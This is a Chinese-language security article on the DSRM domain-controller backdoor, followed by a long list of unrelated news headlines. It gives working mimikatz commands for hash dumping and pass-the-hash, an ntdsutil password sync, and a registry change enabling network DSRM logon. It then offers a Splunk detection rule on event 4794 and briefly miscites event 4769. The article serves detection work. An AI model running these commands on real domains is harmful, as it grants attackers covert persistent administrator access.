01、简介
(资料图片)
每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。
域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。
02、利用方式
(1)获取域内用户Hash
使用mimikatz查看域内用户test的NTLM Hash。
mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test
(2)将DSRM帐户和域用户的NTLM Hash同步
使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。
(3)抓取DSRM密码
因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。
mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam
(4)修改DSRM登录方式
DSRM 有三种登录方式,具体如下:
0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
修改注册表:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
(5)使用DSRM远程登录
在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。
mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040
03、攻击检测
当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。
4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。
安全规则:
index=ad EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message
安全告警效果如下图:
摩洛哥南部地震致至少296人遇难 血液中心呼吁民众积极献血
被蜱虫咬属于意外险吗?赔偿要提供什么材料?
2023国际高桥极限运动邀请赛举行
筹集5693套保租房 开建4267套棚改房 宜昌5000余“新市民”圆了“安居梦”
富士X100V迭代款将更新 配备新镜头
持续推进长三角一体化,沪苏水域交通组织一体化若干措施发布
【青视点】剑指“中国休闲体育之城” 莱西打算这么干
长城汽车魏建军转型中很擅长做“毫不犹豫”的事
幻想传说修复弓(幻想传说x)
祝贺!中国女乒包揽四强!王艺迪逆转伊藤美诚,日本女乒全军覆没
烧瓷器的失败作品“嘴硬壶”意外成网红 山东买家288元买下 2000元不愿意转让
“种黄花这条路走对啦!”
火山引擎ByteHouse上线ELT能力,进一步降低企业数字化维护成本
iFixit拆毁了三星的新款GalaxyS22和S22Ultra智能手机
600元可亲吻? 莫把“沉浸式消费”玩成“沉沦式消费”
今日车轱辘是什么意思饭圈(车轱辘话什么意思)
公职人员被儿子举报出轨朋友妻子 官方回应:已被停职并立案调查
人工智能赋能可持续投资
探索数字化普惠金融新路径
通辽市奈曼旗300MW风电项目二标段37台风机吊装完成
安卓将迈入2TB时代!三星Galaxy S24 Ultra首发:售价过万
亚盛集团:8月31日融资净买入276.08万元,连续3日累计净买入734万元
南京新百4140万预付款背后 交易对手疑为控股股东关联方
sw2018破解版详细安装教程云魔方(solidworks魔方云学院)
江苏南通可提供东芝洗碗机维修服务地址在哪
公大研招网 公大
世茂股份:截止8月底未能按期支付债务累计84.8亿元
8月31日超讯通信涨停分析:智能制造,5G,智慧物流概念热股
捷途大圣对比长安CS55 PLUS,谁高颜高配强动力,更讨年轻人欢心?
新城发展:一年内到期债务256.16亿元,确保每一笔债务提前或到期偿付
主板纺织股(主板纺织上市企业名单2023)
宋祖儿前公司否认实名举报 称未参与艺人纳税申报
9月1日起实施!呼和浩特市三部门联合通知
供应链人士称Wi-Fi 7出货将于2024年放量
首张水上加油站危化品经营许可证颁发 崇川区18家相关企业计划年底前全部领证
北京市全力以赴确保“课前到书,人手一册”迎开学
相关新闻